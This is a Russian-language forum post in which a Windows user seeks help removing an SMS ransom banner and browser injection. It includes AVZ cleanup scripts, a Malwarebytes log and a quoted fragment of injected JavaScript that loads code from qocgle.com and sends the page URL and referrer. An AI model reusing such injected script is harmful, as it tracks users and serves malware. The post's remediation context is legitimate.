Браузеры заблокированы баннером с смс на 3381
Добрый день
Помогите пожалуйста с проблемой. Бьюсь уже три дня
Все началось с левого апдейта Файрфокса.
После этого комп начал тупить и через некоторое время ФФ выдал, что в системе троян и надо поставить апдейт, причем платный.
А через неск.минут выдал во весь экран баннер с СМС на 3381
В ИЕ аналогично.
CureIt нашел только модифицированный hosts с подменой адресов.
Результат AVZ
http://exfile.ru/186625
результат HiJack здесь
http://exfile.ru/186631
Далее я выполнил скрипт в AVZ
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('C:\WINDOWS\system32\pxxshpi.dll',' ');
DeleteFile('C:\WINDOWS\system32\pxxshpi.dll');
BC_ImportALL;
ExecuteSysClean;
ExecuteWizard('SCU', 2, 2, true);
BC_Activate;
RebootWindows(true);
end.
после перезагруза прогнал AVZ - вроде чисто. ушел в ребут и потребовал проверить диск физически по полной. нашел кучу потерянных кластеров. вылечился.
возможно, что винда пыталась восстановить потертые при зачистке кеши браузеров и т.д.
Все сделал, Почистил. Осталась проблема: при заходе на некоторые сайты ловлю баннер.
Поставил фильтр на скрипты страниц.
Обнаружил, что у меня браузер приклеивает к низу страницы дополнительный кусок с обращением на сайт qocle.com
И осталось, что некоторые страницы упрямо в коде остаются. Общее подтормаживание подсказывает, что сидит зараза где-то.
AVZ лог тут http://exfile.ru/186745
HiJack тут http://exfile.ru/186742
затем пофиксил в HiJack
F2 - REG:system.ini: UserInit=\\.\globalroot\systemroot\system32\userin it.exe,
20 - Winlogon Notify: DeviceNP - DeviceNP.dll (file missing)
Выполнил скрипт в AVZ:
Код:
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('C:\WINDOWS\vsnpstd3.exe','');
DeleteService('catchme');
BC_ImportAll;
ExecuteWizard('TSW',2,2,true);
BC_Activate;
RebootWindows(true);
end.
Компьютер перезагрузился. Сохранил в архив карантин
Код:
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine .zip');
end.
Браузер продолжает показывать иногда код вместо страниц (он режет начало кода, как я заметил, превращая сраницу в мусор)
Архив карантина здесь: http://exfile.ru/186976
вчера еще поставил Malwarebyte и прогнал им.
Вот его лог
Malwarebytes' Anti-Malware 1.51.0.1200
www.malwarebytes.org
Database version: 6919
Windows 5.1.2600 Service Pack 2
Internet Explorer 8.0.6001.18702
22.06.2011 20:57:47
mbam-log-2011-06-22 (20-57-41).txt
Scan type: Full scan (C:\|)
Objects scanned: 336890
Time elapsed: 1 hour(s), 46 minute(s), 25 second(s)
Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 3
Registry Values Infected: 1
Registry Data Items Infected: 0
Folders Infected: 1
Files Infected: 3
Memory Processes Infected:
(No malicious items detected)
Memory Modules Infected:
(No malicious items detected)
Registry Keys Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Ext\Stats\{FFFC57DB-1DE3-4303-B24D-CEE6DCDD3D86} (Adware.MyCentria) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\MyCentria (Adware.MyCentria) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\StimulProfit (Adware.Agent) -> No action taken.
Registry Values Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\TNOD UP (Trojan.Agent.CK) -> Value: TNOD UP -> No action taken.
Registry Data Items Infected:
(No malicious items detected)
Folders Infected:
c:\program files\FieryAds (Adware.Adware.FearAds) -> No action taken.
Files Infected:
c:\program files\tnod user & password finder\TNODUP.exe (Trojan.Agent.CK) -> No action taken.
c:\system volume information\_restore{be2448ee-02b9-4dba-a20e-f0836f944ab8}\RP691\A0270406.EXE (Dont.Steal.Our.Software) -> No action taken.
c:\documents and settings\val_sav\application data\fieryads.dat (Adware.FieryAds) -> No action taken.Скрыть
Все поубивал.
Зачистил все кеши и настройки браузеров, поставил Оперу и Хрому.
Они вообще почти не работают, либо выкидывая баннер, либо зависая на пустой странице. Иногда сыпят кодом.
Переставил старую версию 3.6 ФФ
вот к примеру сейчас раз 10 пытался написать ответ на форум.
открывается пустое окно с куском кода типа
limit: 3,
title_font_size: 3,
favicon: true
});
});
t = d.documentElement.firstChild;
s = d.createElement("script");
s.type = "text/javascript";
s.src = "http://an.yandex.ru/system/context.js";
s.setAttribute("async", "true");
t.insertBefore(s, t.firstChild);
})(window, document, "yandex_context_callbacks");
</script>
</body>
</html>
0
и все.
т.е. где-то сидит зараза, которая мне сначала цепляла всякую дрянь в страницы, а теперь она просто не пропускает часть кода в браузер.
проксей у меня нет
в эксплорере баннер упрямо появляеся на любой странице
если глянуть код страницы, то в конце приклеивается кусок
"://qocgle.com/loPtfdn3dSasoicn/js.php?t=stat&ran="+encodeURIComponent("tS3NkLiAAh zLcpP849yvB4jdTJo9XYeaKfKSfh1U7hNb3qAVby69FVaP8QKf wlyH")+"&r="+escape(document.referrer)+"&u="+escap e(document.URL)+"&v=351&"+Math.random()+"'>"+unesc ape("%3C/script%3E"));}</script></BODY></HTML>
вот на этом самом qocgle.com как раз и сидит зараза.
поставил Хрому - она вообще пробиться не может наружу. повезло, что 2 файрфокса стояло в системе. Первый дефауловый погиб.
Через второй с трудом, но хоть хожу
Поставил Оперу - та же хрень
Баннер везде, пока не отключаю ява-скрипты
После этого через некоторое время начинает тормозить и выдавать куски кода.
Или вообще ничего.
Похоже какой-то виртуальный прокси перехватывает все по 80 порту.
Спецы, кто помогал - говорят, что все чисто. И быть такого не может, но оно же есть.
Помогите пожалуйста.
Заранее благодарю.
Сообщение от thyrex
